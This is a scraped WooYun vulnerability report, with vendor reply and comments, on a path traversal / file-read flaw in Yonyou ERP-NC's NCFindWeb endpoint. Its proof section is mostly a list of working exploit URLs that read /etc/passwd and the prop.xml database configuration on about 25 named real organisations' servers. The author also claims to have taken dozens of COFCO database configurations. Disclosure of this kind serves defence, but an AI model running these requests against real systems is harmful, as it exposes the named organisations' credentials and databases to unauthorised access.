用友ERP-NC某处通用文件包含漏洞(影响中粮集团/民生电商/清华大学/爱国者等大量知名校政企案例)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0148227

漏洞标题：用友ERP-NC某处通用文件包含漏洞(影响中粮集团/民生电商/清华大学/爱国者等大量知名校政企案例)

漏洞作者：管管侠

提交时间：2015-10-21 00:09

修复时间：2016-01-19 18:20

公开时间：2016-01-19 18:20

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-21：细节已通知厂商并且等待厂商处理中
2015-10-21：厂商已经确认，细节仅向厂商公开
2015-10-24：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航）
2015-12-15：细节向核心白帽子及相关领域专家公开
2015-12-25：细节向普通白帽子公开
2016-01-04：细节向实习白帽子公开
2016-01-19：细节向公众公开

简要描述：

@@
可读取passwd、数据库配置，已获取中粮集团十几组数据库群配置

详细说明：

可以遍历各种系统文件，影响大量知名政校企

漏洞证明：

中粮集团
http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

还可以读取默认配置文件
http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
下面有中粮几十组数据库配置，数据库群

民生电商
http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

数据库配置
http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

清华大学
http://proxy.tup.tsinghua.edu.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

http://proxy.tup.tsinghua.edu.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

爱国者
http://nc.aigo.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

以下也都是有效案例
http://nc.bcegc.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://oa.tianue.com:8888/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://nc.sd-gold.com:9081/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://jchcehr.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://erp.liando.cn:7777/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://nc.sinomach.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://nc.biichg.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://erp.liando.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://nc.huamao.cc/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://sinomachiufo.sinomach.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://nc.xhlbdc.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://nc.hkfs.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://nc.bjsogd.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://ehr.btg.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://www.sqk.com.cn:7888/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://nc.elion.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://www.fjctsgroup.com:8090/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://cksnc.keshun.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://nc.gohigh.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://erp.ljth.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://nc2.dazd.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
........还有太多

修复方案：

版权声明：转载请注明来源管管侠@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-10-21 14:40

厂商回复：

多谢!

漏洞评价：

评价

2015-10-21 06:59 | HackBraid ( 核心白帽子 | Rank:1837 漏洞数:291 | HackBraid昵称的由来是一款名为Braid的游戏...)

前排
2015-10-21 08:27 | 我的邻居王婆婆 ( 普通白帽子 | Rank:2544 漏洞数:437 | 最近我在追美丽的秘密这部电视剧)

...出差4天没带笔记本，看到NC就知道这个漏洞果然被发现了
2015-10-25 13:33 | s4cr00t ( 实习白帽子 | Rank:32 漏洞数:7 | 自由，共享，平等)

用友这次竟然没有忽略……
2015-12-25 14:47 | whynot ( 普通白帽子 | Rank:532 漏洞数:96 | 为你解冻冰河为你放弃世界有何不可)

@我的邻居王婆婆大牛就是屌每次提示都是级别足够但是无法查看 Rank 高于自己的白帽子漏洞
2015-12-25 14:52 | 我的邻居王婆婆 ( 普通白帽子 | Rank:2544 漏洞数:437 | 最近我在追美丽的秘密这部电视剧)

果然是我的洞，我在 WooYun: 用友ERP-NC某处通用文件包含漏洞(影响中粮集团/民生电商/清华大学/爱国者等大量知名校政企案例) 公开后，就准备发了，但出差没想带电脑，回来就被....
2015-12-26 14:52 | 小红猪 ( 普通白帽子 | Rank:285 漏洞数:48 | little red pig!)

yonyou这次大方了，哈哈哈...

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0148227

漏洞标题：用友ERP-NC某处通用文件包含漏洞(影响中粮集团/民生电商/清华大学/爱国者等大量知名校政企案例)

相关厂商：用友软件

漏洞作者：管管侠

提交时间：2015-10-21 00:09

修复时间：2016-01-19 18:20

公开时间：2016-01-19 18:20

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源管管侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0148227

漏洞标题：用友ERP-NC某处通用文件包含漏洞(影响中粮集团/民生电商/清华大学/爱国者等大量知名校政企案例)

相关厂商：用友软件

漏洞作者： 管管侠

提交时间：2015-10-21 00:09

修复时间：2016-01-19 18:20

公开时间：2016-01-19 18:20

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0148227"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 管管侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：管管侠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源管管侠@乌云